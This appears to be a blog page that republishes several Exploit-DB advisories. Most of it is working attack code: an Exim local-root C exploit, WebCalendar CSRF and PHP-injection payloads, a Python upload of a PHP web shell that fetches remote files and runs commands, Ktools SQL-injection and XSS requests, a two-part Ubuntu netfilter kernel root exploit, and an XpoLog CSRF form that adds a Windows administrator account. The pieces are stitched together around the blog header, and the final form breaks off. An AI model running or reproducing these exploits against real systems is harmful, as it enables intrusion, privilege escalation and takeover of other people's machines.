/*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hello List,
This is just a minor issue in Exim, no replies so far, so publication
should be OK.
Introduction:
============
Exim4 in some variants is started as root but switches to uid/gid
Debian-exim/Debian-exim. But as Exim might need to store received
messages in user mailboxes, it has to have the ability to regain
privileges. This is also true when Exim is started as "sendmail".
During internal operation, sendmail (Exim) will manipulate message
spool files in directory structures owned by user "Debian-exim"
without caring about symlink attacks. Thus execution of code as
user "Debian-exim" can be used to gain root privileges by invoking
"sendmail" as user "Debian-exim".
POC:
===
http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
demonstrates the issue using a ELF file being both executable
and shared library which is invoked multiple times by different
processes.
Results, Discussion:
===================
As Exim4 process itself is already quite privileged - it has to
access the user mailboxes with different UIDs anyway - the having
such problems is expectable and explainable. A change in documentation
might make sense, to indicate, that the special user "Debian-exim"
is only intended to mark files being used by the daemon, but not
to provide root/daemon user privilege separation.
Even without this vulnerability, a "Debian-exim" process could
use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
to escalate to "adm" group, which again makes it very likely to
use "syslog", "apache" or other components to escalate to root
via "/var/log". This is annoying, perhaps this should get a CVE
to make daemon-to-root escalations harder in general.
Timeline:
========
20160605: Discovery, report Debian security
20160607: Writeup
20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
20160630: Publication
References:
==========
* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
-----BEGIN PGP SIGNATURE-----
iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
=4IJk
-----END PGP SIGNATURE-----
* This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* for more information.
*
* Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
* Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
*/
#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
#define UPGRADE_LIB_DIR "/var/spool/exim4"
#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
extern char **environ;
#if defined(__x86_64__)
const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
#define init_args(argc, argv) __asm__ volatile ( \
"mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
:"=m"(argc), "=r"(argv)::"memory")
#endif /* __x86_64__ */
/** Library initialization function, called by the linker. If not
* named _init, parameter has to be set during linking using -init=name
*/
extern void _libInit() {
if(geteuid()!=0) return;
int result=chown(UPGRADE_FILE_NAME, 0, 0);
assert(!result);
result=chmod(UPGRADE_FILE_NAME, 04755);
assert(!result);
exit(0);
}
extern void _entry (void) {
int argc=0;
char **argv = NULL;
init_args(argc, argv);
int result=main(argc, argv);
exit(result);
}
extern void pam_start() {}
extern void pam_set_item() {}
extern void pam_chauthtok() {}
extern void pam_end() {}
extern void pam_strerror() {}
extern void pam_getenvlist() {}
extern void pam_open_session() {}
extern void pam_close_session() {}
extern void pam_get_item() {}
extern void pam_acct_mgmt() {}
extern void pam_setcred() {}
extern void pam_authenticate() {}
int main(int argc, char **argv) {
DIR *dirStruct;
struct dirent *dirEnt;
char linkPath[1024];
int result;
assert(argc>1);
if(!strcmp(argv[1], "--Exec")) {
setresgid(0, 0, 0);
setresuid(0, 0, 0);
execve(argv[2], argv+2, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
if(!strcmp(argv[1], "--Repair")) {
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
assert(!result);
chmod(TARGET_PATH, atoi(argv[4]));
return(0);
}
if(!strcmp(argv[1], "--Upgrade")) {
struct stat origStatData;
stat(TARGET_PATH, &origStatData);
char *execArgs[6];
int childPid=fork();
if(!childPid) {
int inputFd=open("/dev/null", O_RDONLY);
dup2(inputFd, 0);
execArgs[0]="/usr/sbin/sendmail";
execArgs[1]="root@localhost";
execArgs[2]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
dirStruct=opendir("/var/spool/exim4/msglog");
assert(dirStruct);
result=1;
while(result) {
while((dirEnt=readdir(dirStruct))) {
if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
strncpy(linkPath+23, dirEnt->d_name, 16);
result=symlink(TARGET_PATH, linkPath);
assert(!result);
fprintf(stderr, "Relinked %s\n", linkPath);
break;
}
rewinddir(dirStruct);
}
closedir(dirStruct);
while(1) {
struct stat currentStatData;
stat(TARGET_PATH, ¤tStatData);
if(currentStatData.st_uid!=origStatData.st_uid) break;
sleep(1);
}
waitpid(childPid, NULL, 0);
fprintf(stderr, "Target ready for writing\n");
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
char *origData=(char*)malloc(origStatData.st_size);
result=read(targetFd, origData, origStatData.st_size);
assert(result==origStatData.st_size);
struct stat newStatData;
stat(UPGRADE_FILE_NAME, &newStatData);
char *newData=(char*)malloc(newStatData.st_size);
int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
result=read(selfFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
close(selfFd);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
fsync(targetFd);
childPid=fork();
if(!childPid) {
execArgs[0]="/bin/su";
execArgs[1]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, origData, origStatData.st_size);
close(targetFd);
childPid=fork();
if(!childPid) {
char numbers[128];
char *ptr=numbers;
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Repair";
result=sprintf(ptr, "%d", origStatData.st_uid);
execArgs[2]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_gid);
execArgs[3]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_mode);
execArgs[4]=ptr;
execArgs[5]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Exec";
execArgs[2]="/bin/bash";
execArgs[3]="-c";
execArgs[4]="id; exec $0";
execArgs[5]=NULL;
execve(execArgs[0], execArgs, environ);
return(1);
}
fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
return(1);
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591793
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==========================
www.k5n.us/webcalendar.php
Product:
==================
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
======================
CSRF PROTECTION BYPASS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
From WebCalendar "include/functions.php" file on line 6117:
////////////////////////////////////////////////////////////
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/////////////////////////////////////////////////////////////////////////////////////////
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===============
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
<meta name="referrer" content="none">
<form id="CSRF" action="
http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567" />
<input name="upassword2" id="newpass2" type="password" value="1234567" />
</form>
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
<meta name="referrer" content="none">
<form id="CSRF_ACCESS_CTRL" action="
http://localhost/WebCalendar-1.2.7/admin.php" method="post"
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>
#######################################################
Vulnerability Type:
======================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Since WebCalendars install script is not removed after installation as
there is no "automatic" removal of it, low privileged users can inject
arbitrary
PHP code for the "Database Cache" directory value as no input validation
exists for this when a user installs the application using the WebCalendar
walk
thru wizard.
If WebCalendars installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain
code execution on the target system. The only item that is required is the
user must have privileges to authenticate to the MySQL Database and to run
the
install script. So, users who have install wizard access for the
WebCalendar application will now have ability to launch arbitrary system
commands on the
affected host.
One problem we must overcome is WebCalendar filters quotes " so we cannot
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat
this
obstacle using the all to forgotten backtick `CMD` operator!.
e.g.
*/?><?php echo `/bin/cat /etc/passwd`; ?>
This results in "settings.php" being injected like...
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
Exploitation steps(s):
=====================
1) Login to the WebCalendar Installation Wizard.
2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).
*/?><?php exec(`calc.exe`); ?>
5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.
Disclosure Timeline:
===============================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
#!/usr/bin/python
# недействительный 31337 Team
# p4yl04d = https://bethebeast.pl/?p=953 [[::ch4n6e 1p::]]
import requests
import json
from requests.auth import HTTPBasicAuth
url = 'http://192.168.1.152:8080/tiki/vendor_extra/elfinder/php/connector.minimal.php'
headers = {
'Host': '192.168.1.152:8080',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type': 'multipart/form-data; boundary=_Part_1337'
}
payload = (
'--_Part_1337\n'
'Content-Disposition: form-data; name="cmd"\n\n'
'upload\n'
'--_Part_1337\n'
'Content-Disposition: form-data; name="target"\n\n'
'l1_Lw\n'
'--_Part_1337\n'
'Content-Disposition: form-data; name="upload[]"; filename="evil.php"\n'
'Content-Type: application/octet-stream)\n\n'
'/*<?php /**/ error_reporting(0); if (isset($_REQUEST["fupload"])) { file_put_contents($_REQUEST["fupload"], file_get_contents("http://192.168.1.10/" . $_REQUEST["fupload"]));};if (isset($_REQUEST["fexec"])) { echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";};\n'
'--_Part_1337--\n'
)
# If your target uses authentication then use:
# upload = requests.post(url, headers=headers, data=payload, auth=('admin', 'admin'))
upload = requests.post(url, headers=headers, data=payload)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
#
# Sell various sizes or formats of the same photo.
# Sell photos, vector art, zip files and more.
# Sell videos PhotoStore Pro Only
# Sell prints, artwork, products, packages, digital collections and more.
# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
# Email notifications to both you and the customer upon purchase.
# Customers can instantly download after payment.
# Customers can instantly download their files after payment.
# Connects to PayPal and 2Checkout.
# Built in credit system to allow your customers to buy credits.
# Allow your members to upload and sell their photos and other media while you take a commission.
# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
# Request Data #1 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
# Request Data #2 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
# Cross Site Scripting Proof—Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
#
# In Order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support dectected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c:\\windows\\system32\\cmd.exe"" />
<input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
